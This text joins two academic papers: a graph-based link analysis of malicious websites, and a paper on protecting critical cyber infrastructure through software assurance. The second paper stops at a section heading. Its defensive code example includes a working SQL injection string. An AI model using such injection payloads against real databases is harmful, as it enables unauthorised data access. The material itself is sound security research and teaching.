Figure 1, obtained from the Google Online Security blog, shows an increase in the number of malicious websites (Provos, 2010). The increase in the number of internet users has made the web a promising means for spreading malware. The exponential growth of websites on the World Wide Web has made traditional crawling an infeasible option for detecting malicious websites. The crawling mechanism must be paired with intelligence to achieve an optimal detection rate, an approach often referred to as intelligent crawling. Previous work has shown that some hosting companies act as a safe medium for hosting malicious websites (Kalafut, Shue and Gupta, 2010), and has used code-based and host-based features for the dynamic detection of malicious websites (Ma et al., 2009; Cova, Kruegel and Vigna, 2010). In this paper we present a few interesting heuristics of these malicious websites that help in enhancing their detection rate.
Figure 1: Growth of the number of entries on the Google Safe Browsing Malware List<br />
This paper is organized as follows: in Section 2, we discuss the technical terms that help in understanding our results. In Section 3, we discuss the processes involved in our study. In Section 4, we describe our dataset. In Section 5, we discuss the analysis of the dataset. In Section 6, we discuss the link visualization. In Section 7, we conclude with the results.
2. Related technical terms<br />
2.1 Indegree<br />
Indegree of a node is defined as the number of edges pointing towards a node. For example, the<br />
indegree of node A in Figure 2 is 3 since there are three edges from nodes B, C, D pointing towards<br />
node A.<br />
Figure 2: Graph demonstrating node A with indegree 3<br />
2.2 Outdegree<br />
Outdegree of a node is defined as the number of edges pointing out from a node. For example, the<br />
outdegree of node A in Figure 3 is 3 since there are three edges emerging from A pointing towards<br />
nodes B, C, D.<br />
Figure 3: Graph demonstrating node A with outdegree 3<br />
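Both degree measures can be computed in a single pass over a directed edge list. The sketch below is illustrative (not the authors' code) and reproduces the values for node A from Figures 2 and 3:

```python
from collections import Counter

def degrees(edges):
    """Return (indegree, outdegree) counts for a directed edge list."""
    indeg, outdeg = Counter(), Counter()
    for src, dst in edges:
        outdeg[src] += 1  # edge leaves src
        indeg[dst] += 1   # edge points at dst
    return indeg, outdeg

# Edges of Figure 2 (B, C, D point to A) and Figure 3 (A points to B, C, D).
edges = [("B", "A"), ("C", "A"), ("D", "A"),
         ("A", "B"), ("A", "C"), ("A", "D")]
indeg, outdeg = degrees(edges)
print(indeg["A"], outdeg["A"])  # 3 3
```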
2.3 Clustering coefficient<br />
The clustering coefficient is a measure of the degree of closeness among the nodes of a graph (Clustering Coefficient, 2010). Chakrabarti and Faloutsos (2006) stated that the clustering coefficient represents the clumpiness of the graph. The clustering coefficient of a node is computed as the ratio of the number of links that exist among the node's neighbors to the number of possible links among those neighbors. The clustering coefficient of a node with 0 or 1 neighbors is 0.
Clustering coefficient of all the nodes are computed and averaged to get the clustering coefficient of<br />
the network. For example, consider the graph shown in the Figure 4.<br />
Node A has three neighbors namely, B, C and D. BC is the only link among the neighbors of A.<br />
Number of possible links among the neighbors of A are 3 (i.e. 3 C2). Therefore, the clustering<br />
coefficient of A is 0.33.<br />
Node B has two neighbors and there is one link among the neighbors of B. Therefore, the<br />
clustering coefficient of B is 1.<br />
Node C has two neighbors and there is one link among the neighbors of C. Therefore, the<br />
clustering coefficient of C is 1.<br />
Node D has two neighbors and there is no link among the neighbors of D. Therefore, the<br />
clustering coefficient of D is 0.<br />
Node E has only one neighbor. Therefore, the clustering coefficient of E is 0.
Figure 4: Graph used for explaining clustering coefficient<br />
The clustering coefficient of a graph is computed using the following formula:
C = (1/n) Σ Ci
where C represents the clustering coefficient of the graph, Ci represents the clustering coefficient of node i, and n is the total number of nodes in the graph (Clustering Coefficient, 2010). The clustering coefficient of the graph in Figure 4 is therefore 0.466 (i.e. (1/5)(0.33+1+1+0+0)).
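The per-node ratio and the graph average above can be reproduced with a short routine. The adjacency below is a reconstruction of the Figure 4 topology implied by the worked example (edges A-B, A-C, A-D, B-C, D-E; the exact figure is not reproduced here):

```python
from itertools import combinations

def clustering_coefficient(adj):
    """Average clustering coefficient of an undirected graph.

    adj maps each node to the set of its neighbours. Nodes with
    fewer than two neighbours contribute a coefficient of 0.
    """
    coeffs = []
    for node, neighbours in adj.items():
        if len(neighbours) < 2:
            coeffs.append(0.0)
            continue
        possible = len(neighbours) * (len(neighbours) - 1) / 2
        # Count links that actually exist between pairs of neighbours.
        actual = sum(1 for u, v in combinations(neighbours, 2) if v in adj[u])
        coeffs.append(actual / possible)
    return sum(coeffs) / len(coeffs)

# Assumed topology of Figure 4, reconstructed from the worked example.
adj = {
    "A": {"B", "C", "D"},
    "B": {"A", "C"},
    "C": {"A", "B"},
    "D": {"A", "E"},
    "E": {"D"},
}
print(round(clustering_coefficient(adj), 3))  # 0.467
```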
3. Processes<br />
Construction of our dataset is composed of three processes.<br />
The first process deals with the collection of malicious websites from multiple sources<br />
The second process deals with the construction of link structure for the malicious domains<br />
obtained in the previous process<br />
The third process deals with computing the geographical location of the websites based on the IP<br />
address to geographical location mapping<br />
3.1 Collection of malicious websites<br />
The process of collecting the malicious websites is initialized by identifying the potential sources using<br />
the meta-search engines. These sources publish the websites with different sets of associated<br />
attributes. Some of the attributes associated with these domains are date, type of attack, executable<br />
name and IP address. A custom parser was used for each website source to retrieve the domain<br />
name and the IP address if available. All the malicious websites collected from these sources are<br />
stored in the database.<br />
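As a rough illustration of this step, the sketch below parses a hypothetical blocklist line format (domain optionally followed by an IP address). The real sources each publish their own formats and would each need their own parser; the line format here is an assumption, not any source's actual format:

```python
import re

# Hypothetical entry format: a domain name, optionally followed by an IPv4 address.
ENTRY = re.compile(r"^(?P<domain>[\w.-]+\.\w+)(?:\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?")

def parse_entry(line):
    """Return (domain, ip) from one blocklist line; ip is None if absent."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    return m.group("domain"), m.group("ip")

print(parse_entry("evil-domain.test 203.0.113.7"))  # ('evil-domain.test', '203.0.113.7')
print(parse_entry("another-bad.example"))           # ('another-bad.example', None)
```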
3.2 Construction of link structure for malicious websites<br />
Crawling is performed on the malicious websites obtained from the previous process using a custom program. The malicious websites are crawled up to the second hop. The flowchart for the process of building the link structure is shown in Figure 6. All the malicious domains retrieved from the various sources are loaded and act as the seeds for the crawling process, where 'n' is the total number of malicious websites. A custom crawler was built to retrieve the content of the malicious websites and parse all the anchor tags from the content. The parsing of the anchor tags from the website content is done using BeautifulSoup (Beautiful Soup, 2010), a widely used HTML parser. All the links originating from the respective malicious websites are stored in the database. The domain is parsed from each such link and is stored in the tuple corresponding to that link. If the link URL is not listed among the malicious websites, it is added to a list called LinkWebsites, which avoids duplicate URLs. Once all the malicious domains are crawled and their corresponding links are stored, the LinkWebsites list is loaded into the MaliciousWebsites list to crawl all the new websites obtained in the first hop from the malicious websites. The process of crawling, parsing anchor tags and storing the links is then repeated. Thus, all the links within the first two hops emerging from the malicious websites are obtained.
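The anchor-tag extraction at the heart of each crawl step can be sketched as follows. The authors used BeautifulSoup; this stand-in uses the standard library's HTMLParser so the idea is self-contained. The page fetching, database storage and LinkWebsites bookkeeping are omitted, and the sample page is hypothetical:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class AnchorExtractor(HTMLParser):
    """Collect the domain of every <a href=...> tag on a page."""

    def __init__(self):
        super().__init__()
        self.domains = set()

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href")
        if href:
            domain = urlparse(href).netloc
            if domain:  # skip relative links with no domain part
                self.domains.add(domain)

# Hypothetical page content with two outgoing links.
page = '<a href="http://example.com/x">x</a> <a href="http://evil.test/p">p</a>'
parser = AnchorExtractor()
parser.feed(page)
print(sorted(parser.domains))  # ['evil.test', 'example.com']
```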
3.3 Computing geographical location of websites<br />
The location of the server on which a website is hosted was determined using IP address to geographic location mapping. All the distinct domains stored during the link analysis phase are translated to their corresponding IP addresses using the Domain Name System (DNS). A custom script performs the domain name to IP address translation using the 'nslookup' command. The IP address to location mapping is done using an open-source database. All the IP addresses for which no location is identified are mapped to latitude and longitude values of 0 and 0 respectively.
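The domain-to-IP step can be illustrated with the standard library. The text describes a wrapper around 'nslookup'; socket.gethostbyname performs an equivalent lookup and is used here only as a stand-in. The IP-to-location database lookup itself is not shown, since it depends on an external dataset:

```python
import socket

def resolve(domain):
    """Return the IPv4 address for a domain, or None if resolution fails.

    Failed resolutions are the cases the text maps to latitude/longitude (0, 0).
    """
    try:
        return socket.gethostbyname(domain)
    except socket.gaierror:
        return None

print(resolve("localhost"))             # 127.0.0.1
print(resolve("no-such-host.invalid"))  # None
```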
4. Dataset<br />
For our experiments, all the potential sources for the malicious websites were identified using the<br />
meta-search engines. Such identified sources used for the study were PhishTank, Malware Domain<br />
Blocklist, abuse.ch, MalwarePatrol, joewein.de LLC. and Malware Domain List.<br />
Figure 5: Flowchart for the process of malicious websites collection.<br />
All the malicious websites listed in these sources were collected and stored in the database. Crawling was performed on the collected malicious websites up to the second hop, as described in Section 3.2, to build the link structure for all the malicious websites.
Finally, the domains obtained during the first two processes of the data collection were translated to their geographical locations using the process described in Section 3.3. To perform a comparative analysis of the malicious websites against the legitimate websites, the top 1500 websites were downloaded from Alexa (Top Sites, 2010), a source for top websites, and were crawled up to the second hop. This set is referred to as the legitimate or non-malicious websites in the remainder of this paper.
Around 350,000 distinct malicious websites were collected from the previously mentioned sources. Since these domains had been detected and flagged as malicious, a major portion of them were down at the time of the analysis: only about 20,000 distinct URLs, about 5.7% of the malicious websites collected, were alive for our analysis. Link analysis was performed on about 19,000 of the 20,000 live malicious websites. The remaining websites did not have any text on which to perform link analysis, as they pointed to files such as executables, jars and binaries.
Around 600,000 Uniform Resource Locators (URLs) were crawled during the collection of our dataset, at a rate of 50 URLs per minute. Of the live malicious websites, 14,970 domains were hosted in the United States. The top five countries contributed 83% of the total malicious websites in our dataset.
Figure 6: Process of construction of link structure up to two hops originating from malicious websites<br />
Figure 7: Overview of the process for the construction of the dataset<br />
Table 1: Top five countries by the number of malicious websites hosted in our dataset
Country Number of malicious websites
United States 14790
Philippines 1086
Canada 432
Germany 183
United Kingdom 143
5. Link analysis
5.1 Outdegree and indegree of malicious websites<br />
The indegree and the outdegree of the malicious websites within the dataset were computed, and two graphs were plotted showing the count of malicious domains versus the indegree and the outdegree. For computing the indegree and the outdegree of the websites, we considered only the links among different domains, as most of the links within the same domain were identified as navigational links. The count versus indegree and count versus outdegree graphs are shown in Figure 8. The outdegree and the indegree of the malicious websites did not satisfy the power law, in contrast to the World Wide Web graph (Watts and Strogatz, 1998).
In an attempt to identify an equation that fits the indegrees and outdegrees of malicious websites, we found that the malicious websites satisfy a power law with an exponential cutoff. The lambda and gamma values of the power law with exponential cutoff equation for the indegree and the outdegree of the malicious websites were identified to be 12.32, 0.9 and 8.32, 1.02 respectively. The correlation coefficient was measured to verify the fit of these equations; it was 0.98 and 0.99 for the indegree and the outdegree respectively, signifying a good fit.
The power law with exponential cutoff has the form
f(x) ∝ x^(−γ) · e^(−λx)
where e^(−λx) is the exponential cutoff term and x^(−γ) is the power law term (Clustering Coefficient, 2010).
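The fit verification described above (correlating observed counts with the fitted model) can be sketched as follows. The degree counts and the model constant here are made up for illustration; they are not the paper's data, and the paper's reported lambda and gamma values came from fitting its own dataset:

```python
import math

def power_law_cutoff(x, gamma, lam, c=1.0):
    """Power law with exponential cutoff: f(x) = c * x**(-gamma) * exp(-lam * x)."""
    return c * x ** (-gamma) * math.exp(-lam * x)

def pearson(xs, ys):
    """Pearson correlation coefficient between two equal-length samples."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(xs, ys))
    sx = math.sqrt(sum((a - mx) ** 2 for a in xs))
    sy = math.sqrt(sum((b - my) ** 2 for b in ys))
    return cov / (sx * sy)

# Hypothetical observed counts per degree, compared against the model.
degree_values = list(range(1, 10))
observed = [520, 190, 80, 34, 15, 7, 3, 1.5, 0.7]
predicted = [power_law_cutoff(x, gamma=1.02, lam=0.8, c=1200) for x in degree_values]
print(round(pearson(observed, predicted), 2))
```

A correlation close to 1 for the real dataset is what supports the authors' claim of a good fit.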
Figure 8: Count of malicious websites versus indegree (left) and outdegree on the log-log scale (right)<br />
The average indegree of the malicious websites was 4.1 and the average outdegree was 3.9. The standard deviations of the indegree and the outdegree of the malicious websites were 9.3 and 6.04 respectively. The average indegree was greater than the average outdegree even though the indegree computation is limited to the crawled dataset, indicating that malicious websites tend to have a higher indegree than outdegree. The outdegree of the malicious websites was then compared with the outdegree of the legitimate websites; we omitted the indegree from this comparison because the indegrees are limited to the links existing within the dataset. The graph plotting the outdegrees of the malicious and the legitimate websites is shown in Figure 9.
Figure 9: Count of malicious websites versus outdegree on the log-log scale for the malicious and the<br />
non-malicious websites<br />
The average outdegree of the malicious websites was 3.9 with a standard deviation of 6.04, while the average outdegree of the non-malicious websites was 39.17 with a standard deviation of 30.64. The standard deviation of the non-malicious websites was very high compared to that of the malicious websites. The standard deviations of the outdegrees about their means signify that the major portion of the non-malicious websites have an outdegree greater than 10, while the major portion of the malicious websites have an outdegree less than 10. The spike in the series of malicious websites at the outdegree of 89 was due to a cluster of about 35 websites which had links to each other.
5.2 Malicious websites linked through a non-malicious website<br />
For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of<br />
edges. All the distinct domains obtained during the construction of the link structure were considered<br />
as the vertices of graph G. Based on the links obtained during the construction of link structure, the<br />
vertices were connected with directional edges.<br />
All the malicious websites that were part of the link structure were loaded into set S. In order to<br />
identify the non-malicious websites facilitating malicious websites, all the vertices which were not in S<br />
and had a minimum of one edge pointing towards them from a vertex in S and minimum of one edge<br />
emerging from them towards another vertex in S were selected.<br />
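The vertex selection just described can be sketched directly from an edge list (the function and domain names are illustrative, not the authors' code):

```python
def facilitating_nodes(edges, malicious):
    """Non-malicious nodes with at least one incoming edge from the malicious
    set S and at least one outgoing edge back into S."""
    from_mal, to_mal = set(), set()
    for src, dst in edges:
        if src in malicious and dst not in malicious:
            from_mal.add(dst)  # receives a link from a malicious site
        if dst in malicious and src not in malicious:
            to_mal.add(src)    # links out to a malicious site
    return from_mal & to_mal

# Hypothetical link graph: promo.test sits between two malicious domains.
edges = [("bad1.test", "promo.test"), ("promo.test", "bad2.test"),
         ("bad1.test", "innocent.test")]
print(facilitating_nodes(edges, {"bad1.test", "bad2.test"}))  # {'promo.test'}
```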
In this analysis, we tried to identify domains which were not themselves malicious but had links to malicious websites. It was observed that around 5,000 malicious websites were linked through 950 non-malicious websites.
To make the study effective, some of these non-malicious domains were visited manually to better understand how the links to malicious domains were being placed. The main reason for this sort of linking is that traffic sellers build up websites with a high PageRank that drive traffic towards the malicious websites, which are short lived; according to Stevens (2010), the traffic sellers are paid based on the number of clicks or the number of victims.
As most of the traffic towards non-popular domains arrives through search engines, the traffic sellers use these non-malicious domains as a means of driving traffic towards the newly built malicious websites. The distribution of the outdegrees of the facilitating websites is shown in Figure 10. Figures 11, 12 and 13 show screenshots of websites promoting malicious websites in different ways.
Figure 10: Number of facilitating websites against their respective outdegrees on the log-log scale<br />
The mean outdegree of the facilitating websites was identified to be 50.12 with a standard deviation of 30.13. This mean outdegree is high compared to the mean outdegrees of both the malicious and the legitimate websites. The facilitating websites thus have a high outdegree, mimicking the behavior of the legitimate websites rather than that of the malicious websites.
Figure 11: Figure shows a screenshot of beautfulwallpapers.com<br />
The website in Figure 11 is non-malicious but has links to malicious websites in the top left corner (marked in box), deceiving users into believing that all of them belong to the same website.
Figure 12: Figure shows a screenshot of bizar.com<br />
The website in Figure 12 is non-malicious but promotes links to malicious websites with relevant<br />
content at the bottom of the page (marked in box).<br />
The website in Figure 13 is not malicious but has links to other malicious websites in the right column (marked in box) under the heading "TRY MORE". The similarity between the products in the right column and the product of the main website draws the user's attention towards them.
5.3 Malicious websites linked to other malicious websites<br />
For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of<br />
edges. All the malicious websites that participated in the construction of the link structure were<br />
considered as the vertices of graph G. Based on the links obtained during the construction of the link<br />
structure, the vertices were connected with directional edges. In order to identify the malicious<br />
websites linked to other malicious websites, all the vertices which had links to another vertex were<br />
selected.<br />
Figure 13: Figure shows the screenshot of cddvdcopy.net<br />
In our study of link analysis, it was observed that around 1,000 malicious websites linked directly to another malicious website. Manual analysis was done on these sites to better understand the linking mechanism. The reason for such links might be that many malicious domains are under the control of a single envelope stealer who hosts multiple types of attacks on different domains; in such a case the envelope stealer would prefer to have links among the malicious domains under their control. The domains encountered in this category were fewer than in the previous category. The main reason might be that envelope stealers restrict the traffic sellers, as the victims would otherwise become common among different envelope stealers. However, reaching a conclusion on this point would require a detailed analysis of the coding style and the type of attack used, which is out of scope for this study. Figures 14, 15 and 16 show screenshots of examples of malicious websites in this category.
Figure 14: Screenshot of the website legalizationofmarijuana.com<br />
Figure 15: Screenshot of the website howtogrowmarijuanablog.com<br />
Figures 14, 15 and 16 are screenshots of malicious websites linking to other malicious websites. All three sites are malicious and have links to each other under the links section in the left column of the page (marked in box).
5.4 Clustering coefficient of malicious websites<br />
The clustering coefficient was computed among the malicious websites to identify their closeness, and was compared with the clustering coefficient of the legitimate websites to understand the differences in the linking mechanism. The clustering coefficient of the malicious websites was identified to be 0.18, and a significant portion of this value is contributed by the facilitating websites. By contrast, the clustering coefficient of the legitimate websites was identified to be 0.59, more than three times that of the malicious websites. This shows that the links among the malicious websites are few in number.
Figure 16: Screenshot of the website medicalmarijuanablog.com<br />
6. Link visualization<br />
Links were visualized on Google Maps using the Google Maps application programming interface (API). The geographic locations of the websites, pre-computed from an IP-address-to-location database, were used to plot them on the map. Link visualization provides an interactive means of analyzing the patterns followed by the links among different websites. The interactive map supports zooming and displays the name of a website when its marker is clicked.
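The plotting code is not included in the paper; a minimal sketch of the data-preparation step, assuming hypothetical site names, coordinates, and a simple JSON payload handed to a Google Maps front end, might look like:

```python
import json

# Hypothetical pre-computed IP-to-location results: site -> (lat, lng, kind)
sites = {
    "malicious-one.example": (52.52, 13.40, "malicious"),
    "malicious-two.example": (40.71, -74.00, "malicious"),
    "facilitator.example": (48.85, 2.35, "facilitating"),
}
# Directed links observed by the crawler
links = [
    ("facilitator.example", "malicious-one.example"),
    ("malicious-one.example", "malicious-two.example"),
    ("malicious-two.example", "malicious-one.example"),
]

def to_map_payload(sites, links):
    """Build marker and polyline records for a Google Maps front end."""
    markers = [
        {"site": s, "lat": lat, "lng": lng,
         "color": "red" if kind == "malicious" else "blue"}
        for s, (lat, lng, kind) in sites.items()
    ]
    seen = set(links)
    lines = [
        {"from": src, "to": dst,
         # red for links that exist in both directions, green otherwise
         "color": "red" if (dst, src) in seen else "green"}
        for src, dst in links
    ]
    return {"markers": markers, "lines": lines}

print(json.dumps(to_map_payload(sites, links), indent=2))
```

A JavaScript page using the Maps API would then draw each marker and polyline; the colour convention mirrors the one described for Figures 17 and 18.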
In Figure 17, the malicious websites and the facilitating websites are marked with red and blue markers respectively. Red lines represent bidirectional links, green lines represent incoming links with respect to the facilitating website, and blue lines represent outgoing links with respect to the facilitating website. Lines leaving one edge of the map continue from the opposite edge. The two images make it evident that links traverse malicious domains across different countries, showing that the attackers do not limit the hosting of their malicious websites to a single hosting service or country.
In Figure 18, the red lines represent bidirectional links and the green lines represent unidirectional links. In Figure 19, selecting a domain displays all of its links to malicious domains on the map. A green line represents an incoming link with respect to the selected domain, a red line represents a bidirectional link, and a blue line represents an outgoing link with respect to the selected domain.
7. Conclusion
In this work we presented several heuristics of malicious websites that can enhance the mechanisms used to detect them.
We characterized the behavior of the malicious websites with respect to their indegrees and outdegrees, and defined an equation that fits the indegree and outdegree distributions of the malicious websites, which follow a power law with exponential cutoff.
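The fitted parameters are not reproduced here; as an illustration, a power law with exponential cutoff has the form p(k) = C k^(-gamma) e^(-k/kappa), and the sketch below (with invented parameter values) shows how the cutoff suppresses the tail relative to a pure power law:

```python
import math

def degree_model(k, c, gamma, kappa):
    """Power law with exponential cutoff: p(k) = c * k**(-gamma) * exp(-k / kappa)."""
    return c * k ** (-gamma) * math.exp(-k / kappa)

# Illustrative parameters only; the paper's fitted values are not given here
c, gamma, kappa = 1.0, 1.5, 50.0

# Compare tail decay at k = 10 and k = 100
pure = [k ** (-gamma) for k in (10, 100)]
cut = [degree_model(k, c, gamma, kappa) for k in (10, 100)]
print(cut[1] / cut[0] < pure[1] / pure[0])  # True: the cutoff decays faster
```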
We compared the outdegree of the malicious websites with that of the legitimate websites and concluded that malicious websites tend to have a lower outdegree.
We computed the clustering coefficient of the malicious websites, compared it with that of the legitimate websites, and showed that linking among the malicious websites is sparse compared to linking among the legitimate websites.
Our analysis showed that attackers use legitimate websites with high Google PageRank as a means of directing traffic towards the malicious websites.
We presented a new way of visualizing the links on a map using their geographical locations, and showed that the attackers do not limit the hosting of their malicious websites to a single country or hosting service but spread them across the world.
Figure 17: Visualization of malicious websites connected through the facilitating websites<br />
Figure 18: Visualization of malicious domains linked to other malicious domains<br />
Figure 19: Customized link visualization, with domains listed in the left pane
8. Future work<br />
We are planning to perform similarity analysis among malicious websites to identify clusters of malicious sites under common control, which will help in understanding the behavior and characteristics of groups of attackers. We are also planning to extend this study using content analysis of the malicious webpages.
Acknowledgements<br />
We would like to thank our data sources PhishTank, Malware Domain Blocklist, MalwarePatrol,<br />
Malware Domain List, joewein.de LLC. and abuse.ch.<br />
The Strategies for Critical Cyber Infrastructure (CCI) Protection<br />
by Enhancing Software Assurance<br />
Mecealus Cronkrite, John Szydlik and Joon Park<br />
Syracuse University, USA<br />
micronkr@syr.edu<br />
jaszydli@syr.edu<br />
jspark@syr.edu<br />
Abstract: Modern organizations are becoming more reliant on complex, interdependent, integrated information systems. Key national industries form the critical infrastructure (CI) and include telecommunications, energy, healthcare, agriculture, and transportation. These CI industries are becoming more dependent on a critical cyber infrastructure (CCI) of computer information systems and networks that are vital to the continuity of the economy. Organized attackers are increasing in number and in computing power, and increasingly threaten CCI software systems. The motivations for attacks include terrorism, fraud, identity theft, espionage, and political activism. Government and industry research has found that most cyber attacks exploit known vulnerabilities and common software programming errors. Software vendors have been unable to agree on or implement a secure coding standard, and the non-technical consumer is too ill-informed to demand secure, quality products. These conditions perpetuate preventable risk. As a result, software vendors do not implement security unless specifically required by the customer, leaving many systems full of gaps. Since most exploited vulnerabilities are preventable, the implementation of a minimum level of software quality is one of the key countermeasures for protecting the critical information infrastructure. Government and industry can improve the resilience of the CI in an increasingly interdependent network of information systems by protecting the CCI with stronger software assurance practices and policies and by strengthening product liability laws and fines for non-compliance. In this paper we discuss the increasing software and market risks to the CCI and address strategies to protect the CCI by enhancing software assurance practices and policies.
Keywords: critical cyber infrastructure, secure programming quality, software assurance<br />
1. Introduction<br />
The first major Internet attack, by the Morris worm in 1988, was a bad prank gone awry, but it made clear, for the first time, that cyber security threats could escape physical boundaries. Cyber threats could now spread rapidly through the Internet and impact different organizations and countries simultaneously. In 2001, Code Red and Nimda were the first attacks to disrupt the commercial Internet, affecting many business and e-commerce sites (Gelbstien & Kamal, 2002). Next, the 2003 SQL Slammer worm caused major disruption to commercial and banking systems; the attack exploited a weakness for which a patch already existed but had not been applied across enough of the consumer base, and the resulting Internet slowdown damaged even companies that were not themselves infected. In 2003, the Sobig virus temporarily shut down 23,000 miles of a railway system, arguably the first successful CI attack (McGuinn, 2004). However, the 2010 Stuxnet SCADA attack was undoubtedly the first of its kind to disrupt CI operations. Its entry point was ultimately attributable to a hard-coded SQL administrative password (Falliere, et al., 2010), a well-known bad development practice. In the twenty-two years since Morris, damage from cyber security incidents has grown in frequency and impact.
Over the past ten years especially, the number of successful CCI attacks has been increasing. The profile of the creators of malware programs has changed since the days of the Morris worm. Today malware is developed and used primarily by criminal actors for financial gain, and potentially by other actors seeking to cause market instability and economic damage.
In the past, computing attacks required access to high-end computing, which was limited to well-funded, established entities that could support large data centres and computer clusters. However, the introduction of the botnet has created a black market for spam sending, decryption and large-scale brute-force cracking, and Distributed Denial of Service (DDoS) attacks for hire, at very cheap prices scaled according to the target size (OECD, 2008).
A “botnet” is a criminal distributed-computing network created by compromising victim devices, usually through malware that exploits existing software weaknesses, and making each one a slave or “zombie” of the larger criminal network. As the computing power of non-secured internet-connected devices increases, so does the collective computing power of botnets. It is typical
to see botnets with over ten thousand nodes or hosts under their command (US-CERT, 2005). Very large botnets such as Conficker or Mariposa controlled millions of nodes.
Botnets can also run any distributed application criminals can imagine; they are “criminal clouds”, active and operational years ahead of industry. These rogue ad-hoc botnets have greatly strengthened the computing arsenal of non-state criminal and terrorist organizations (Council of Europe Counterterrorism Task Force, 2007). Motivated attackers now have access to cheap, large-scale “stolen” computing grids. As a result, all the baseline security presumptions associated with securing or encrypting data and with securing the data’s availability over the internet have been greatly weakened.
2. Background<br />
2.1 The relationship between the CI and the CCI<br />
Figure 1: CCI IS stack by security control and influence<br />
The US Department of Homeland Security Presidential Directive 7 (HSPD-7) defines the critical infrastructure (CI) by the importance of an industry to society and the economy, e.g. transportation, agriculture, energy, healthcare, telecommunications, and emergency services. The critical cyber infrastructure (CCI) comprises the information systems that support the operation of these key sectors. DHS’ National Cyber Command Division (NCCD) is responsible for protecting the CCI in the US and focuses on helping the CI industries “conduct vulnerability assessments, develop training, and educate the control systems community on cyber risks and mitigation solutions.” (McGurk Testimony, 2010)
We can layer the components that intersect in a malware attack by their ability to control or influence security processes, as in Figure 1. Developer knowledge and skill are the final arbiters of code quality, with the software publisher’s development methodology supervising those decisions. Therefore, the ability to control and change security behaviour depends on the quality practices of the software publisher and its developers (Wang, et al., 2008). Responsibility for software security rests with the company that publishes the code and with the developers who participated in system development, because their knowledge of the system exceeds that of any other sphere of influence.
2.2 The increasing risk to Critical Cyber Infrastructure (CCI)<br />
Losses attributable to coding defects or weak configuration have increased in all industry sectors. The impact of cyber attacks grows as dependence on CCI systems designed with poor practices continues. Up until the 2010 Stuxnet attack, critical infrastructure systems were ‘siloed’, or separated
from possible internet damage. Stuxnet thwarted this final defence and achieved its attack through a series of weaknesses in software practices (Falliere, et al., 2010).
Malware can get into vulnerable systems without detection by anti-virus measures because it exploits trusted software. Bad programming practices cause most preventable malware attacks (Goertzel et al., 2007). The Software Engineering Institute estimates that 90 percent of reported security incidents result from exploits against defects in the design or code of software (Mead, et al., 2009). The defects exploited stem from a relatively small number of known programming errors, such as failing to check data input before adding it to a database, hard-coding, or developing applications that depend on over-privileged accounts to run (MITRE & SANS, 2010).
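To make the first of these errors concrete, the sketch below (invented table and payload, using Python's standard sqlite3 module) contrasts a query built by string concatenation with a parameterized query that treats the same input as data:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

user_input = "x' OR '1'='1"  # classic injection payload

# Vulnerable: unchecked input concatenated straight into the SQL text
vulnerable = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'").fetchall()

# Safe: a parameterized query keeps the input as data, not SQL
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()

print(len(vulnerable), len(safe))  # 1 0 -- injection matched every row
```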
Malware has an additional hidden cost to the economy because the true costs of the “zero-day” malware effect are extremely difficult to measure while the malware is undetectable. When vulnerable software is released, on its “zero-day” the attackers’ activities can be neither blocked nor detected. The delay between the developer learning of a flaw and making a fix available, and administrators installing it on all affected systems, can stretch to years. Even with patches available, the zero-day risk is still a threat to the CI when organizations or consumers are unaware of the risk or the patch. Patching is a failed program of reactive repairs.
3. Software risks to the Critical Cyber Infrastructure (CCI) and proposed mitigations<br />
The aim is to assess the potential damage caused by cyber threats and to find ways to strengthen the resilience and defence of the CCI. “Stuxnet demands that we look not just to the security community but also to the system designers, planners, engineers, and operators of our essential technology and physical infrastructures.” (Assante, 2010)
One of the first rules of defence is deterrence, so approaches for enhancing the current level of CCI defence should begin with fixing preventable errors. Software assurance is a form of deterrence because it is the practice of providing high levels of software quality free of known defects (Wang, et al., 2008). Techniques such as coding standards improve deterrence by making simple attacks fail and by increasing the resources needed for a successful attack.
3.1 Mitigation: Developer non-repudiation<br />
Requiring CI software developers and publishers to sign their code modules creates an accountability process. To implement code signing, a system similar to the web domain registration system, with a ‘WhoIs’-style lookup, could be combined with a Public Key Infrastructure (PKI) like the SSL registration systems. Developers could then sign every code module or app, tying it to an individual developer and publisher. Major popular IDEs could also support a PKI plug-in for code signing during development; certificates for code signing are already available as plug-ins in many IDEs.
Developer accountability can be handled at a level similar to engineering: for example, if the senior developer signs the code, then they are accountable for security issues later, just as an architect or engineer is. Company management should sign the final code again so that they also have tangible accountability for the software quality, much as the US Sarbanes-Oxley (SOX) law requires the CEO and CFO to sign off on the accuracy of public financial records.
Customer systems could be configured to disallow anonymous code from running. By forcing all software to present credentials in order to run, we can begin to establish a trace for code that is working or failing.
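A minimal sketch of this accountability chain follows, assuming a hypothetical developer registry analogous to the WhoIs-style lookup proposed above. A real deployment would use PKI certificates and asymmetric signatures for true non-repudiation; this illustration substitutes an HMAC over the module bytes:

```python
import hashlib
import hmac

# Hypothetical registry mapping developer IDs to identities and signing keys
REGISTRY = {"dev-42": {"name": "A. Developer", "key": b"dev-42-secret"}}

def sign_module(dev_id, module_bytes):
    """Developer signs a code module; the tag binds module content to identity."""
    key = REGISTRY[dev_id]["key"]
    return hmac.new(key, module_bytes, hashlib.sha256).hexdigest()

def verify_module(dev_id, module_bytes, tag):
    """Customer system refuses code whose signature does not check out."""
    if dev_id not in REGISTRY:
        return False  # anonymous code is disallowed
    expected = sign_module(dev_id, module_bytes)
    return hmac.compare_digest(expected, tag)

module = b"print('hello CI')"
tag = sign_module("dev-42", module)
print(verify_module("dev-42", module, tag))                 # True
print(verify_module("dev-42", module + b"#tampered", tag))  # False
```

A customer system would call verify_module before executing any module, refusing anonymous or tampered code.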
3.2 Mitigation: Create development tools to assist and automate security<br />
